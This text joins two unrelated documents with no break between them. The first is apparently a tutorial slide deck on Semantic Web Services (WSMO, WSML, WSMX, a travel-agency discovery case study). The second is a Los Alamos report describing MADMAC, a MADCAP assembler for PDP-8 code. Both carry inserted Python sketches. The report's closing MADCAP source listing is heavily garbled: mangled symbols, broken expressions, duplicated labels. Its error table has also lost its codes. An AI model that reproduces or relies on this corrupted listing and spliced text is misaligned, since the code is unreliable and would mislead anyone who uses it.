  - Data Level: mediate heterogeneous Data Sources
  - Protocol Level: mediate heterogeneous Communication Patterns
  - Process Level: mediate heterogeneous Business Processes

Mediation Techniques

(Figure: mediator usage — components connect heterogeneous elements and apply mediation techniques for heterogeneity resolution; WW, WG, GG, and OO Mediators are invoked and executed in a Mediation Execution Environment. Legend: modelling element, logical connection.)

Mediators as services
- A WSMO Mediator uses a Mediation Service via
  - a Goal
  - directly
  - optionally including Mediation
- Source Component, Target Component, Mediation Services

(Figure: process mediation patterns (a)–(d) and an example of process mediation.)

WSMO Perspective
- WSMO provides a **conceptual model** for Web Services and related aspects
- WSMO separates the different **language specification layers** (MOF style)
  - The language for defining WSMO is the meta-meta-model in MOF
  - WSMO and WSML are the meta-models in MOF
  - Actual goals, web services, etc.
are the model layer in MOF
  - Actual data described by ontologies and exchanged is the information layer in MOF
- Stress on solving the integration problem
  - Mediation as a key element
  - Languages to cover a wide range of scenarios and improve interoperability
  - Relation to industry WS standards
- All the way from conceptual modelling to usable implementation (WSML, WSMX)
- Language: WSML — human-readable syntax, XML exchange syntax; RDF/XML exchange syntax under consideration

**WSML**

**Key features:**
- One syntactic framework for a set of layered languages
- Normative, human-readable syntax
- Separation of conceptual and logical modeling
- Semantics based on well-known formalisms
- WWW language
- Frame-based syntax

**WSML vs OWL**

The relation between WSML and OWL+SWRL is still to be completely worked out:
- WSML-Core is a subset of OWL Lite (DL ∩ Datalog)
- WSML-DL is equivalent to OWL DL
- WSML-Flight (the name plays on "F-Logic" and "Light") extends to the LP variant of F-Logic

but for other languages the relation is still unknown.
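The "DL ∩ Datalog" characterization of WSML-Core above can be made concrete with a toy Datalog-style evaluator: facts plus Horn rules, evaluated bottom-up to a fixpoint. The domain terms below are borrowed from the tutorial's travel ontology, but the evaluator itself is a generic sketch, not part of any WSML tool.

```python
# Minimal naive-fixpoint Datalog evaluation, illustrating the kind of
# rule language (Horn rules over ground facts) that WSML-Core/Flight
# rest on.  Variables are written "?x"; everything else is a constant.

facts = {
    ("memberOf", "Florianopolis", "BrazilCity"),
    ("memberOf", "Campinas", "BrazilCity"),
    ("subConceptOf", "BrazilCity", "City"),
    ("subConceptOf", "City", "Location"),
}

rules = [
    # memberOf is inherited along subConceptOf (instance inheritance)
    (("memberOf", "?x", "?c2"),
     [("memberOf", "?x", "?c1"), ("subConceptOf", "?c1", "?c2")]),
    # subConceptOf is transitive
    (("subConceptOf", "?a", "?c"),
     [("subConceptOf", "?a", "?b"), ("subConceptOf", "?b", "?c")]),
]

def unify(atom, fact, env):
    """Match one body atom against a ground fact, extending env."""
    env = dict(env)
    for pat, val in zip(atom, fact):
        if pat.startswith("?"):
            if env.get(pat, val) != val:
                return None
            env[pat] = val
        elif pat != val:
            return None
    return env

def matches(body, db, env):
    """Yield all variable bindings satisfying the whole rule body."""
    if not body:
        yield env
        return
    first, rest = body[0], body[1:]
    for fact in db:
        if len(fact) == len(first):
            env2 = unify(first, fact, env)
            if env2 is not None:
                yield from matches(rest, db, env2)

def fixpoint(db, rules):
    """Apply all rules until no new facts can be derived."""
    db = set(db)
    changed = True
    while changed:
        changed = False
        for head, body in rules:
            for env in list(matches(body, db, {})):
                new = tuple(env.get(t, t) for t in head)
                if new not in db:
                    db.add(new)
                    changed = True
    return db

derived = fixpoint(facts, rules)
```

With these rules, `("memberOf", "Florianopolis", "City")` and `("memberOf", "Campinas", "Location")` are derived automatically, which is the flavor of inference a WSML reasoner performs over an ontology.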
**WSML Variants**

(Figure: WSML variant hierarchy — WSML-Core at the base; WSML-DL extending it towards Description Logics; WSML-Flight (Datalog/Horn with nonmonotonic negation, F-Logic flavored) and WSML-Rule extending it towards Logic Programming; WSML-Full on top, based on First-Order Logic with nonmonotonic extensions.)

**WSML Layering**

(Figure: WSML-Full contains WSML-DL and WSML-Rule; WSML-Rule contains WSML-Flight; WSML-DL and WSML-Flight both contain WSML-Core. The variants are grounded in Description Logics, Logic Programming, and First-Order Logic.)

### Relation to Web Services Technology

<table>
<thead>
<tr>
<th></th>
<th>OWL-S</th>
<th>WSMO</th>
<th>Web Services Infrastructure</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Discovery</strong></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>What it does</td>
<td>Profile</td>
<td>Web Services (capability)</td>
<td>UDDI API</td>
</tr>
<tr>
<td><strong>Choreography</strong></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>How it is done</td>
<td>Process Model</td>
<td>Orchestration + choreography</td>
<td>BPEL4WS</td>
</tr>
<tr>
<td><strong>Invocation</strong></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>How to invoke</td>
<td>Grounding + WSDL/SOAP</td>
<td>Grounding</td>
<td>WSDL/SOAP</td>
</tr>
</tbody>
</table>

- OWL-S and WSMO map to the UDDI API, adding semantic annotation
- OWL-S and WSMO share a default WSDL/SOAP Grounding
- BPEL4WS could be mapped into WSMO orchestration and choreography
  - Mapping still unclear at the level of choreography/orchestration
  - In OWL-S, multi-party interaction is obtained through automatic composition and invocation of multiple parties
  - BPEL allows hardcoded representation of many Web services in the same specification
  - Trade-off: OWL-S supports substitution of Web services at run time; such substitution is virtually impossible in BPEL.
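The matching notions used in discovery earlier in this tutorial (exact, plugin, subsumption, intersection, non-match) reduce, in the simplest set-based reading, to comparisons between the set of items a goal requests and the set a service provides. This is a sketch under that set-based assumption — real WSMO discovery reasons over logical capability descriptions, not enumerated sets.

```python
def classify_match(goal, service):
    """Classify a goal/service pair by comparing their extensions,
    i.e. the sets of items each one describes (set-based reading)."""
    goal, service = set(goal), set(service)
    if goal == service:
        return "exact"
    if goal <= service:      # everything requested is provided
        return "plugin"
    if service <= goal:      # the service covers only part of the request
        return "subsumption"
    if goal & service:       # some, but not all, items overlap
        return "intersection"
    return "non-match"

# Hypothetical extensions: (from, to) ticket pairs a goal requests
# versus pairs each service can sell, echoing the travel examples.
goal = {("Florianopolis", "Campinas")}
brazil_air = {("Florianopolis", "Campinas"), ("Campinas", "Sao Paulo")}
eu_air = {("Paris", "Berlin")}
```

Under this reading the Florianópolis–Campinas goal is a plugin match for the BrazilAir service and a non-match for the EUAir service, mirroring the discovery results shown in the case study.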
### Conclusion: How WSMO Addresses WS problems

- **Discovery**
  - Provides formal representation of capabilities and goals
  - Conceptual model for service discovery
  - Different approaches to web service discovery
- **Composition**
  - Provides formal representation of capabilities and choreographies
- **Invocation**
  - Supports any type of WS invocation mechanism
  - Clear separation between WS description and implementation
- **Mediation and Interoperation**
  - Mediators as a key conceptual element
  - Mediation mechanism not dictated
  - (Multiple) formal choreographies + mediation enable interoperation
- **Guaranteeing Security and Policies**
  - No explicit policy and security specification yet
  - The proposed solution will interoperate with WS standards
- The solutions are envisioned as maintaining a strong relation with existing WS standards

Topics
- Introduction
- Web Services (WS)
- Semantic Web (SW)
- Semantic Web Services (SWS)
- Some Major Efforts towards SWS
  - WSDL-S
  - OWL-S
  - SWSF (SWSO + SWSL)
  - WSMO (WSMO + WSML + WSMX)
- **Software Tools:** WSMT, WSMX, IRS-III, ...
- Case study: Travelling to SBBD

Software Tools for SWS
- Design Tools
  - WSMT (Eclipse, WSMO API, WSMO-Studio, WSMT, DOME)
- Execution Environments
  - WSMX
- Reasoners
  - WSML2Reasoner
  - IRS-III

WSMT
- WSMT: graph based editing, integration of execution environments
- WSMO Studio: form based editing, support for choreographies
- DOME: tree based editing, support for versioning & distribution
- Built on the Eclipse Platform and the WSMO API

WSMX Architecture

**WSML2Reasoner Framework**

(Figure: a reasoning request, with its result as variable bindings, passes through the WSML Reasoner Interface and normalization steps into a Datalog layer with a symbol map, and down through facades (MINS Facade, KAON2 Facade, ...) to underlying reasoners such as MINS and KAON2.)

**Topics**
- **Introduction**
- **Web Services (WS)**
- **Semantic Web (SW)**
- **Semantic Web Services (SWS)**
- **Some Major Efforts towards SWS**
  - WSDL-S
  - OWL-S
  - SWSF (SWSO + SWSL)
  - WSMO (WSMO + WSML + WSMX)
- **Software Tools:** WSMT, WSMX, IRS-III, ...
- **Case study: Travelling to SBBD**

Case Study: Virtual Travel Agency

SBBD Travelling Ontology

Queries
- ?city[country hasValue Brasil]
- ?city memberOf BrazilCity
- ?country[capital hasValue ?capital]
- ?country[capital hasValue ?capital] and ?capital memberOf EUcity
- ?country[capital hasValue ?capital] and ?city[country hasValue ?country] and ?capital != ?city

Query execution

WSMT Perspectives and Navigator

Other Travel Ontologies; Mediation Services

Web Service BrazilAir

capability webServiceBrazilAirCapability
  postcondition definedBy
    ?ticket[ dO#from hasValue ?from,
             dO#to hasValue ?to,
             dO#vehicle hasValue ?vehicle ] memberOf dO#Ticket
    and ?from memberOf dO#BrazilCity
    and ?to memberOf dO#BrazilCity
    and ?vehicle memberOf dO#Airplane

Goal FLP-CPS
http://www.inf.ufsc.br/~frank/travel/goalFlorianopolisCampinasSBBD2008.wsml

Goal Florianópolis-Campinas

capability goalCapability
  postcondition definedBy
    ?ticket[ dO#from hasValue ?from,
             dO#to hasValue ?to,
             dO#vehicle hasValue ?vehicle ] memberOf dO#Ticket
    and ?from =
dO#Florianopolis and ?to = dO#Campinas.

**Discovered Web Services FLP-CPS**

(Figure: WSMX Monitor interface.)

**Problem!** The current WSMO version does not properly support inference on instances?

---

**Goal BrazilAir**

```
capability goalCapability
  postcondition definedBy
    ?ticket[ dO#from hasValue ?from,
             dO#to hasValue ?to,
             dO#vehicle hasValue ?vehicle ] memberOf dO#Ticket
    and ?from memberOf dO#BrazilCity
    and ?to memberOf dO#BrazilCity
    and ?vehicle memberOf dO#Airplane
```

Discovered Web Services BrazilAir

Goal EUAir

```
capability goalCapability
  postcondition definedBy
    ?ticket[ dO#from hasValue ?from,
             dO#to hasValue ?to,
             dO#vehicle hasValue ?vehicle ] memberOf dO#Ticket
    and ?from memberOf dO#EUCity
    and ?to memberOf dO#EUCity
```

Discovered Web Services EUAir

Conclusions
- SWS research mixes lots of theory and technology
  - Current Web services technology (WSDL, SOAP, UDDI, ...)
  - Semantic Web technology
  - Sophisticated knowledge representation and reasoning
  - Process/workflow technology (orchestration and choreography)
- Some R&D opportunities/challenges in SWS
  - Automated composition of SWS
  - Domain specific issues
  - Software tools for SWS

References – SWS in general

References – SWS major approaches

References – SWS Composition

Thanks all folks!

Questions? Suggestions? Comments? Complaints?
MADMAC, A MADCAP Version of DEC Code MACRO-8 for Assembling PDP-8 Codes on MANIAC

DISCLAIMER

This report was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor any agency thereof, nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial product, process, or service by trade name, trademark, manufacturer, or otherwise does not necessarily constitute or imply its endorsement, recommendation, or favoring by the United States Government or any agency thereof. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or any agency thereof.

This report expresses the opinions of the author or authors and does not necessarily reflect the opinions or views of the Los Alamos Scientific Laboratory.

MADMAC, A MADCAP VERSION OF DEC CODE MACRO-8 FOR ASSEMBLING PDP-8 CODES ON MANIAC

by Allen C. Larson

ABSTRACT

An assembler for PDP-8 codes written in a subset of the DEC-MACRO-8 language has been entirely written in the Maniac compiler language MADCAP. This assembler will accept input from cards or paper tape. The paper tape can either be punched in the Maniac character code or in the ASCII character code. The major difference between MACRO-8 and MADMAC is that MADMAC does not have the macro pseudo-op.
INTRODUCTION

A Digital Equipment Corporation PDP-8 computer has been purchased to control an X-ray diffraction unit at Los Alamos Scientific Laboratory. The assemblers provided by the manufacturer require that the symbolic code being assembled be read in three times to provide both the binary code and a listing. This is a time-consuming process because the only input to this PDP-8, as it exists now, is an ASR-33 teletype unit that has a character read rate of only 10 characters/second.

Dr. W. Busing at ORNL has written a FORTRAN and machine language assembler (PALFTN) for use on the CDC-1604. A copy of this code was obtained and used as the starting point for writing MADMAC, a MADCAP version of MACRO-8, the most sophisticated assembler available for the PDP-8. In this report it is assumed that the reader is familiar with the PAL-III and MACRO-8 languages as described in the manuals published by the Digital Equipment Corporation and that he has a working knowledge of the MADCAP language.

DESCRIPTION

The MADCAP language is ideal for writing purely logical codes such as an assembler. The language provides for manipulation and examination of bits, which makes a character-by-character scan of a character string a straightforward process.

The basic premise of MADMAC is that it will duplicate all features of PAL-III and MACRO-8 except the use of macro definitions. (PALFTN will accept only a subset of the PAL-III language.) A few additions, such as the pseudo-ops FLTG and DUBL in literal definitions, have been made to the MADMAC language beyond those described as available in MACRO-8.

MADMAC reads the symbolic code one line at a time, stores the code for a complete scan and listing on the second pass, and then performs an initial scan of the line to determine whether there are any symbols defined by the statements on the line. If so, it defines them and adds them to the symbol table.
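The two-pass structure described above — pass 1 collects symbol definitions, pass 2 generates code — can be sketched as follows. This is a toy illustration of pass 1 only, for a small PAL-like fragment (label definitions with a comma, assignments with "=", an octal location counter set by "*"); it is not the MADCAP code, and the sample source below is hypothetical.

```python
def pass1(lines):
    """Collect symbol definitions from PAL-like source (toy sketch).

    Handles: 'LABEL, ...' label definitions, 'SYM=value' assignments
    (octal numbers only here), '*NNNN' to set the location counter,
    '/' comments, and ';' statement separators.  Real MADMAC handles
    far more; this only illustrates the first pass.
    """
    symbols = {}
    loc = 0o200                      # PDP-8 programs commonly start at 0200
    for line in lines:
        line = line.split("/")[0]    # strip comment following a slash
        for stmt in line.split(";"):
            stmt = stmt.strip()
            if not stmt or stmt == "$":   # '$' marks end of code
                continue
            if stmt.startswith("*"):      # set the location counter (octal)
                loc = int(stmt[1:], 8)
                continue
            if "," in stmt:               # LABEL, instruction
                label, stmt = stmt.split(",", 1)
                symbols[label.strip()] = loc
                stmt = stmt.strip()
            if "=" in stmt:               # SYM=value; uses no storage
                name, value = stmt.split("=", 1)
                symbols[name.strip()] = int(value.strip(), 8)
                continue
            if stmt:                      # anything else takes one word
                loc += 1
    return symbols

src = [
    "*200",
    "BEG, CLA        / clear AC",
    "TAD CNT; DCA SUM",
    "CNT=7",
    "SUM, 0",
    "$",
]
table = pass1(src)
```

After pass 1, `table` maps each symbol to its value (BEG at 0200, SUM at 0203, CNT equal to 7), which is exactly the information the second pass needs to emit addresses.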
After the complete symbolic code has been read in, all symbols defined, and no errors detected, MADMAC rescans each statement, creates the desired code, and prints a listing. When the second pass is completed the assembler lists the symbols that were defined by the code and gives their values. The literals are then listed with their locations, and, finally, the new code is punched in a format suitable for the PDP-8 binary loader.

The initial scan of a statement is halted when a symbol not terminated by a comma or equal sign is detected. Termination of the scan in the second pass depends on the type (see below) of the first symbol in the statement. The scan continues to the end of the statement if the symbol is type 1 or 2, is terminated immediately if type 4, is terminated by the first space encountered after a symbol defining the address has been read if type 3, and is terminated by the first space encountered if type 0. The end of the statement is defined as a semicolon, a slash, or the end of the line. On cards, "$" indicates the end of a statement. Thus more than one statement can be on a card. In addition to the above conditions for terminating a scan, the scan of a type 3 statement will be terminated after the first literal in the statement has been evaluated. Comments may follow a slash. The end of the code is indicated by the symbol $ appearing as the first non-blank character in the statement.

Symbols can be constructed from any characters in the chosen character set (keypunch, ASCII, etc.). They must not begin with a number smaller than 8, and will be terminated by the first control character encountered.

The control characters and their interpretations are:

| Meaning | Result |
|---|---|
| undefined symbol | It was given a value of 0 (except ignored if after * or /). |
| redefined symbol | The new value was stored. |
| an operator was followed by spaces or comment | If after * or = the whole line is ignored; if after + or -, a 0 was probably used. |
| illegal operation | The address was set to page 0, cell 0. |
| address missing on an order requiring an address | The value of the symbol was computed incorrectly. |
| … in an octal number | Scan of statement terminated; first symbol used for the code. |
| … on a literal | An address of 0 was used. |
| illegal combination of permanent symbols | They were combined. |
| indirect address error (an I or Z was followed by nothing) | |
| illegal page reference | Indirect page reference to symbols on a page other than current or zero page. |
| code word changed | A previously defined word of code was overwritten. |
| 2 periods were encountered in an FLTG number | The second period terminated the number. |
| a minus sign was followed by a plus sign | The plus sign was ignored. |

TABLE II. CLASSIFICATION OF SYMBOLS

<table>
<thead>
<tr>
<th>Symbol Type</th>
<th>Description and allowed use</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>All programmer defined symbols are of this type. They can be used in any manner the programmer wishes.</td>
</tr>
<tr>
<td>1</td>
<td>Group 1 operate instructions. They can only be combined with other group 1 operate instructions.</td>
</tr>
<tr>
<td>2</td>
<td>Group 2 operate instructions. These can only be combined with other group 2 operate instructions.</td>
</tr>
<tr>
<td>3</td>
<td>Memory reference instructions. All should have addresses, otherwise the address will be 0.</td>
</tr>
<tr>
<td>4</td>
<td>Instructions that cannot be modified or combined. The I/O orders fall in this group.</td>
</tr>
</tbody>
</table>

A listing of the MADCAP code for MADMAC is given in the Appendix.

MADMAC is different from MACRO-8 in several important respects.
These are:

- MADMAC does not recognize macros.
- MADMAC does not allow nested literals.
- MADMAC assumes a literal is decimal unless told otherwise by an O following the parentheses (or following a minus sign if negative).
- MADMAC literals must be numbers, not symbols.
- MADMAC literals may be floating point numbers if defined by FLTG or double precision if defined by DUBL. The radix control in MADMAC is always octal.
- MADMAC does not need EXPUNGE.
- MADMAC does not recognize PAUSE.
- MADMAC, at present, only recognizes +, - and space as operators in forming expressions.

OPERATING INSTRUCTIONS

Sense lights 0, 1, 2, 3, 4, 5, and 6 are used to indicate the location and type of input, to control code punching, and to control code processing and listing. The sense lights will be set before reading of the code begins and may be set for the next code as soon as reading has started. The indicated control for the sense lights is:

- 0 on for card deck.
- 1 on for "Japanese" flexo paper tape.
- 2 on for ASCII paper tape.
- 3 off to read next code after punch out without stopping.
- 4 on to punch out only after "$". The computer will stop at #100 on this option even if 3 is off.
- 5 on to perform pass 2 even though errors were detected in pass 1.
- 6 on to include the permanent symbols in the symbol table listing.

The location of secondary codes to be assembled into one program can be further controlled by a character following "$" in the last card in the deck. The character 0 indicates that the next code is on cards; a 1, on paper tape in "Japanese" flexo code; a 2, on paper tape in ASCII code; and a blank indicates that the sense lights will be examined to locate the next code. The secondary codes must be complete in themselves, although they may have the page and location counter preset. The PDP-8 memory load and all location counters are reset after a code has been punched out.
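The literal radix rule above (decimal by default, octal when a trailing O is present, negated by a leading minus sign) can be illustrated with a small sketch. This is modern Python, not MADCAP, and the function name and the exact textual form of a literal are assumptions for illustration; FLTG and DUBL literals are not covered:

```python
# Hypothetical sketch of MADMAC-style integer literal interpretation.
# A literal opens with a parenthesis; a trailing "O" selects octal radix.

def parse_literal(text):
    """Interpret a literal: decimal by default, octal if an 'O'
    follows the digits, negative if a minus sign is present."""
    body = text.lstrip("(")          # literals open with a parenthesis
    negative = body.startswith("-")
    if negative:
        body = body[1:]
    if body.endswith("O"):           # trailing O selects octal radix
        value = int(body[:-1], 8)
    else:                            # otherwise the literal is decimal
        value = int(body, 10)
    return -value if negative else value

print(parse_literal("(100"))    # decimal 100
print(parse_literal("(100O"))   # octal 100 = decimal 64
print(parse_literal("(-77O"))   # octal -77 = decimal -63
```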
The complete permanent symbol table can be changed only when a request for its location is printed on the MK-III. If the track is typed as 0 0 0 0, a new symbol table will be read in from cards; if the track is typed as a number less than 7500, track 7598 will be used. Track numbers larger than 7599 are illegal. Individual symbols in the permanent symbol table can be redefined with the equal sign. An error "rds" will then be printed in the margin, and sense 5 must be on to assemble the code (sense 5 deletes the test on errors detected in the first pass, which would provide only a listing of the symbolic deck and the first pass errors). The MADMAC code, as a binary tape including a "standard" permanent symbol table, is available from the author. APPENDIX Listing of the MADCAP code MADMAC All quotation marks except those enclosing comments were in red in the original listing. All other symbols that were red in the original listing are underlined here. For explanation of the red symbols, see the MADCAP manual. "Madcap Code to assemble PDP-8 Codes" (word-set)Symbol to 500 (word-set)Octet to 500 (80 characters)Stmt to 2000 (word-set)decimal() (word-set)symbol() (real)search() (string)rdasci() (word-set)find() (real)equatr() (real)equate() (word-set)octal() (word-set)literal() (word-set)A, B, Ow, Smb, S, S1 (word-set)fltpt() (word-set)dblp() Err to 2000 (4 characters)Erms to 15 is [" ","uds","rds","nop","iop","itr" cont. ","ich","nco","iae","g12","pge","cwc","2.s","","+a-","" ] t = 0 (word-set)C0 to 4095 Lt, Lc, Ld to 48 new page print: "set sense 0 on for cards, 1 on for JAP flexo tape," cont. " 2 on for ASCII code" print: "set sense 3 on to punch after $$ only" print: "if sense 3 is off, turn sense 4 on to" cont. " stop after code is punched" print: "all above sense lights may be reset for" cont. 
" the next code after reading starts" print: "sense 5 on to ignore pass 1 errors, can be set at anytime" print: "sense 6 on to list the permanent symbols in symbol table " 6 stop #1 #3 Flag = 0 read console by "Symbol table is on track dddd": x if x > 0, go to #10 i = 0 #1 new card read card by "c6(06)2": Symb1, A, B Octeq1 = (A*12) + [(B*4) + (16)] Symb1 = Symb1 x 3f3f3f3f3f3f if Symb1 = 101010101010, go to #2 i = i+1 go to #1 type: "if symbol table is to be written on disk" read console by "type initial track no x":x if x > 7500 write 2 tracks x, #088 1 for j = 0 to i Symbj, Octeqj go to #11 #10 if x < 7500, then x = 7598 read 2 tracks x, #088 1 for j = 0 to i Symbj, Octeqj #11 Pertab = 1 "Permanent table length" #13 for i = 0 to 45: Lt1, Lc1 = 0 Page = 1 for i = 0 to 4096: Cd1 = (20) #12 Itab = Pertab Ierr, Ng = 0 for i = 0 to 45: Ld1 = Lc1 Dpage = Page End = 0 Lite = bank if Flag = 0: Type = ordinal(Lite\times3)-1 n = 0 "# of statements read" #20 if Type = 0 new card read card: Stmt\_n go to #25 if Type = 1 read: Stmt\_n go to #25 Stmt\_n = rdasc1() #25 (672 elements)String = Stmt\_n Err\_n = 0 Pass = 1 j,t = 0 execute iscan() if Err\_n > 0: Ierr = Ierr+1 if End > 0, go to #27 if j > 0 n = n+1 go to #20 if Smbx3f3f3f3f3f3f3f3f3f3f3f3f3f3f3f = 0ef5e0b25101111 Lc\_Page = Lc\_Page+2 if Smbx3f3f3f3f3f3f3f3f3f3f3f3f3f3f3f = 0d2e0b251010 Lc\_Page = Lc\_Page+1 execute wrapup() if j > 0, go to #26 n = n+1 go to #20 #27 if End > 1, go to #700 if sense 5 is on, go to #100 if Ierr > 0 Ipg = 0 for j = 0 to n-1 if (j(mod 60)) = 0 new page print: date print by "Error tag(,)30Statement(,)30Page X": Ipg Ipg = Ipg+1 print by ",(,)3m3(,)6m80":Errs_Err Stmt_j print by ",/x4,errors were detected in pass 1": Ierr go to #13 #100 n = -1 "Second pass" End = 0 Pass = 2 Ipg = 1 for i = 0 to 32: Lc_i = Ld_i Page = Dpage Line = 0 Fpt, Dbl, Cdc = 0 #110 n = n+1 Strng = Stmt_n Sc = 0 Lf = 1 j = 0 #115 Ow = 0 t = 0 if Fpt > 0 execute spaces() A = Strng*8 if ordinal(A) > 9 Fpt = 0 go to #116 
Cdc = 36 Ow = fltgpt() go to #400 if Dbl > 0 execute spaces() A = string 6 if ordinal(A) > 9 Dbl = 0 go to #116 Ow = dblp() Cdc = 24 go to #400 #116 t = 0 execute iscan() if j > 0, go to #500 if End > 0, go to #600 if Smb = 101010101010 if t < 4 Err_n = 4 go to #500 r = t execute spaces Ow = find(symbol()) if r = 5: Ow = subset(ordinal(12-Ow)+1) if Ng > 0 Err_n = 1 go to #400 if Smbx3f3f3f3f3f3f3f3f=0f252d201010 "fltg" Fpt = 1 Cdc = 36 Ow = fltgpt() go to #400 if Smbx3f3f3f3f3f3f3f3f3f=9d2e0b251010 "dubl" Dbl = 1 Cdc = 24 Ow = dblp() go to #400 Ow = find(Smb) if Ng > 0 Err_n = 1 "undefined symbol" go to #400 "store and print" if Ow > (19), go to #400 "no modification allowed" if Ow > (18) execute spaces() if J > 0 Err_n = 5 go to #400 if Strngx16 = 4949 Strng = Strng-(8) go to #160 if Strngx7 = 49 "a current page literal" Ow = Ow+80 Lpg = Page go to #17 if Strngx7 = 44 "a zero page literal" Ow = Owx.................. Lpg = 0 #160 A = literal() #17 for j = 1 to Lt_Lpg if A = Cd_{128}(Lpg+1)-J if A-(12) = 1, go to #18 if A-(24) = 1 J = J+1 go to #18 if A-(36) = 1 J = J+2 go to #18 #17 Lt_Lpg = Lt_Lpg+1 j = Lt_Lpg if Cd_{128}(Lpg+1)-J \neq (20) Err_n = 11 Cd_{128}(Lpg+1)-J = A A = A-(12) if A#1, go to #170 #118 Ow = Ow+subset(128-j) go to #400 #120 S = symbol() if Sx3f3f3f3f3f3f = 221010101010 Ow = Ow+100 "set indirect bit" #130 execute spaces() if j = 0, go to #120 Errn = 8 "indirect address error" go to #400 if Sx3f3f3f3f3f3f = 331010101010 Ow = Ow_ffffff A = find(S) if Ng > 0 Errn = 1 "undefined symbol" go to #400 #135 if t > 3 execute spaces() if j = 0 r = t B = find(symbol()) if Ng > 0: Errn = 1 if r = 5: B = subset(ordinal(12-B)+1) A = subset(ordinal(A)+ordinal(B)) go to #135 Errn = 3 Wpage = ordinal((A-(7))x5) Rp = Page if LcPage = 0: Rp = Rp-1 if Rp = Wpage Ow = Ow+(A+x7)+(7) go to #400 if Wpage = 0 Ow = Ow+(Ax7) go to #400 if Ow < (A) A = (Ax12)+(12) Lpg = Page Ow = Ow+(8,7) go to #1171 Err_n = 10 go to #400 if Ow %16,17 ≠ 0 if t > 3, go to #135 execute 
spaces() if j > 0, go to #400 A = find(symbol()) if Ng > 0 Err_n = 1 go to #400 if (Ow\(\times\)(16,17) ≠ 0 Err_n = 9 "Group 1 and Group 2 operate" Ow = Ow+A go to #150 #160 if t > 3 execute spaces() if j > 0 Err_n = 3 go to #400 r = t A = find(symbol()) if Ng > 0: Err_n = 1 if r = 5: A = subset(ordinal(12-A)+1) Ow = subset(ordinal(A)+ordinal(Ow)) go to #160 "presently codes without bits 16, 17 or 18 = 1" "will not be modified" #400 1 = 120 x Page + Lc Page - 1 if Cdl > (20) Errn = 11 "code word changed" if Cdc > 0 Cdc = Cdc - 12 Cdl = (word-set Ow - (Cdc)) x 12 if Cdc > 0, Lc Page = Lc Page + 1 go to #500 Cdl = Ow #500 if (Line(mod 60)) = 0 new page print by "x": date print by "Error, tag, Lc, Code, 15 Statement, 30 Page, x": Tpg Tpg = Tpg + 1 Line = Line + 1 A = subset (1) if Lf > 0 print by ",, m3 (x) 1 am a 0", Errn, Stmt n go to #110 if Cdl > (18) Sl = Cdl - (2) B = Sl - (1) S = B - (1) Ow = Cdl x 7 if Sc > 0 if Cdl > (18) print by ",, m3 (x) 50 4 , a (b) 2 363" Errn, A, S, B, Sl, Ow go to #590 print by ",, m3 (x) 50 4 , a 4": Errn, A, Cdl go to #590 if Cdc > 0 Err_n = 0 Sc = 1 go to #400 execute wrapup() if j > 0 Sc = 1 Err_n = 0 go to #115 go to #110 #600 Line = 0 "print reference table" i = Pertab+1 if sense 6-1n am: i = 0 for j = i to Itab if (Line(mod 60)) = 0 new page print by "X": date print by "Symbol[,]5Value[,]15Reference[,]30Page,X": Ipg Ipg = Ipg+1 (6 character)Stg = "s"s"s"s"s"s"s"s"s"s" S = Symb_j for i = 0 to 5 (1 character)Strg = (3x8)i(48-8) S = S-(8) Stg = Strg+Strg, print by "m6[,]6s4[,]9[,]64,12": Stg, Octeq_j Line = Line+1 if Lite > (3), go to #12. 
#700 Line = 0 for j = 0 to 31 if Lt_j > 0 for i = Lt_j, Lt_j-1,...,1 A = subset(128(j+1)-1) if (Line(mod 60)) = 0 new page print by "x": date print by "Loc,,,Value(j)30x": Ipg Ipg = Ipg+1 Line = Line+1 print by "n4, ,04": A, Cd_{128(j+1)-1} for j = 0 to 99 "punch out code" | 93 (00) Cksum = 0 "check sum = 0" Orig = 0 for j = 0 to 4095 if Cd_j = (20) Orig = 0 loop back if Orig = 0 A = subset(j) B = [(A-(6))×6]+(6) A = A×6 Cksum = Cksum+ordinal(A)+ordinal(B) | 93 (B) | 93 (A) Orig = 1 A = Cd_j×12 B = A-(6) A = A×6 Cksum = Cksum+ordinal(A)+ordinal(B) A = subset(Cksum) B = (A-(6))x6 A = Ax6 for j = 0 to 100 if Litex(3,4) = 0, go to #13 stop #100 go to #3 "iscan, procedure to scan initial portion of stmt" (... iscan(); all) (word-set)Pge is 200a200c1010 (word-set)Cls is 3f3f3f3f3f3f (word-set)Val #26 execute spaces() if j = 1, go to exit "entire string was spaces or tabs" if Stringx7=(0,6) "an asterisk" String = String - (8) execute spaces() if j > 0 Errn = 3 go to exit Smb = symbol() go to #50 "Symbolic location" if Stringx24 = 78566c End = 1 go to exit if Stringx6=5 "$ or super stop code" Flag = 0 if Stringx 3f3f = 1f1f "2 $ or super stop codes" End = 2 go to exit End = 1 A = (Strng-(8))×8 if ordinal(A) < 3 Type = ordinal(A) Flag = 1 go to exit Smb = symbol() if Smb×Cla=Page execute spaces() if j = 1 Page = Page+1 "nothing after page on the line" go to exit Smb = symbol() Val = find(Smb) if Ng > 0 Err, = 1 Page = ordinal(Val) if t > 3 r = 6 execute spaces() Smb = symbol() A = find(Smb) if Ng > 0 Err, = 1 if r = 4: Page = Page+ordinal(A) if r = 5: Page = Page-ordinal(A) j = 1 go to exit if t = 1, go to #45 "Smb terminated by sp., etc" if t = 2 "Smb was terminated with a," if Pass = 2, go to #26 Ng = equalr(Smb, 128×Page+LePage) if Ng > 0 Err_n = 2 go to exit go to #26 if t = 3 "Smb was terminated with an =" if Pass = 2 j = 1 go to exit execute spaces() if j = 1 "error" Err_n = 3 go to exit S = symbol() if S-(40) = 39 A = subset(Page128+Lc_page) go to #33 A = find(S) if 
